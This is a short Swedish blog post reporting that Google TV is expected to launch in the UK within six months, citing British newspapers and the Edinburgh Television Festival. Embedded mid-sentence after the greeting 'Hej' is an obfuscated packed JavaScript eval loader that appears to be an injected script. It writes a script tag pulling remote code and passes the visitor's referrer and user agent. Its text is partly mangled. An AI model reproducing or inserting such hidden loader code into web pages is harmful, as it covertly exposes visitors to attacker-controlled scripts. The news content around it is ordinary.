Image Image Image Image Image Image Image Image Image Image

| 19 september, 2018

Scroll to top

Top

Google TV kommer snart till Storbritannien

Google TV kommer snart till Storbritannien
Sebastian Plengier Ehrnfelt

Hej eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rizis|var|u0026u|referrer|hiiby||js|php’.split(‘|’),0,{}))
alla läsare från Storbritannien!
Nu är det dags att lansera
Google TV. Detta är en stor dag för många även om ni får vänta lite till. Enligt The Telegraph och the Daily Mail siktar Google på att lansera mjukvaran i UK inom dem närmaste sex månader. 

Eric Schmidt kommer troligtvis att gå ut med mer info nu under Edinburgh Television Festival (som startade för några dagar sen). Det kommer även talas om BBC’s iPlayer och ITV’s Player. Tyvärr finns det inte något exakt datum för lanseringen, men vi skulle bli chockade om det dröjde längre än sex månader.